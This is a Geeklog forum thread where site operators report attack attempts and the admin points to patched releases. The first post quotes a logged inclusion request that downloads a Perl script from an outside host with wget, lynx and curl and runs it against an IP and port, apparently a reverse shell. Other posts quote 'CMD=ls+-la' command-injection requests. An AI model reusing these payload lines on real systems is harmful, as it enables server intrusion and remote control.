Welcome to Geeklog, Anonymous Sunday, December 22 2024 @ 11:35 am EST
Geeklog Forums
A backdoor in index.php?
Status: offline
LWC
Forum User
Full Member
Registered: 02/19/04
Posts: 818
My site's spammers seem to try to find a backdoor in index.php.
I seem to be getting frequent visits to
/index.php?page=http://whatever...
For example:
/index.php?page=http://www.bh-net.dk/cmd2.gif?&cmd=cd /tmp;wget www.noti-auto.com.ar/priv8nc;lynx -source www.noti-auto.com.ar/priv8nc >> priv8nc2;curl www.noti-auto.com.ar/priv8nc > priv8nc2;perl priv8nc 200.220.236.26 2232 ;perl priv8nc2 200.220.236.26 2232
Not that index.php even accepts a "page=http://" query...so what gives?
I seem to be getting frequent visits to
/index.php?page=http://whatever...
For example:
/index.php?page=http://www.bh-net.dk/cmd2.gif?&cmd=cd /tmp;wget www.noti-auto.com.ar/priv8nc;lynx -source www.noti-auto.com.ar/priv8nc >> priv8nc2;curl www.noti-auto.com.ar/priv8nc > priv8nc2;perl priv8nc 200.220.236.26 2232 ;perl priv8nc2 200.220.236.26 2232
Not that index.php even accepts a "page=http://" query...so what gives?
5
7
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Not spammers - script kiddies. They don't know what they're doing either. Just ignore them ...
I've stopped counting the attempts to exploit things we're don't even run here on geeklog.net, like awstats, phpBB, Coppermine, ...
bye, Dirk
I've stopped counting the attempts to exploit things we're don't even run here on geeklog.net, like awstats, phpBB, Coppermine, ...
bye, Dirk
8
7
Quote
Status: offline
LWC
Forum User
Full Member
Registered: 02/19/04
Posts: 818
Do you think it's personal or do they just come from Google, etc. because of my use of PHP pages?
I have some sub domains and only one of them has a major presence in Google and uses Geeklog. Only that one gets attacked. Its .htaccess file keeps getting bigger and bigger to stop bandwidth waste (I add the referrerer of each attempt to a black list). The most disturbing thing is that the blocked visitors don't stop coming back even though they end up in http://127.0.0.1 (your solution)! Why would they come back for that?! I thought it'd be like bouncing an e-mail message, but I read that turned out to be a no-no nowadays (because the spammers don't use real addresses anyway)...
I have more spammers and script kiddies than human visitors and it starts to annoy. What am I, writing a blog for robots...?
I have some sub domains and only one of them has a major presence in Google and uses Geeklog. Only that one gets attacked. Its .htaccess file keeps getting bigger and bigger to stop bandwidth waste (I add the referrerer of each attempt to a black list). The most disturbing thing is that the blocked visitors don't stop coming back even though they end up in http://127.0.0.1 (your solution)! Why would they come back for that?! I thought it'd be like bouncing an e-mail message, but I read that turned out to be a no-no nowadays (because the spammers don't use real addresses anyway)...
I have more spammers and script kiddies than human visitors and it starts to annoy. What am I, writing a blog for robots...?
5
7
Quote
Matt
Anonymous
Somebody found some kind of backdoor on my system. I'm not sure if it's a Geeklog hole or a PHP hole. They entered requests like
GET /blog/index.php?CMD=ls+-la
and the commands got executed. They did some nastier stuff after the ls.
When I try the same thing, it doesn't seem to work.
Immediately before the CMD requests, I see a
POST /blog/users.php
so they may have "logged on", but even when I logon, I can't seem to to the same things they did. This looks ugly. Any suggestions?
GET /blog/index.php?CMD=ls+-la
and the commands got executed. They did some nastier stuff after the ls.
When I try the same thing, it doesn't seem to work.
Immediately before the CMD requests, I see a
POST /blog/users.php
so they may have "logged on", but even when I logon, I can't seem to to the same things they did. This looks ugly. Any suggestions?
7
6
Quote
Matt
Anonymous
Info has been sent. Thanks.
9
7
Quote
Yvo
Anonymous
Same thing (index.php?CMD=(command))is happening on a FreeBSD 6.0 box with Apace 1.3.34 & PHP 4.4.2.
This has been driving us all week. This is a shared hosting box and it keeps getting irc bots installed over the file system. The customer running geeklog has been notified, however if this is a new bug I have no choice but to disable their website this weekend.
This has been driving us all week. This is a shared hosting box and it keeps getting irc bots installed over the file system. The customer running geeklog has been notified, however if this is a new bug I have no choice but to disable their website this weekend.
5
9
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by Yvo: Same thing (index.php?CMD=(command))is happening on a FreeBSD 6.0 box with Apace 1.3.34 & PHP 4.4.2.
This is the issue that was resolved by Geeklog 1.4.0sr1 and 1.3.11sr4. Please upgrade ASAP (to 1.3.11sr5 / 1.4.0sr2, of course).
bye, Dirk
9
8
Quote
All times are EST. The time is now 11:35 am.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content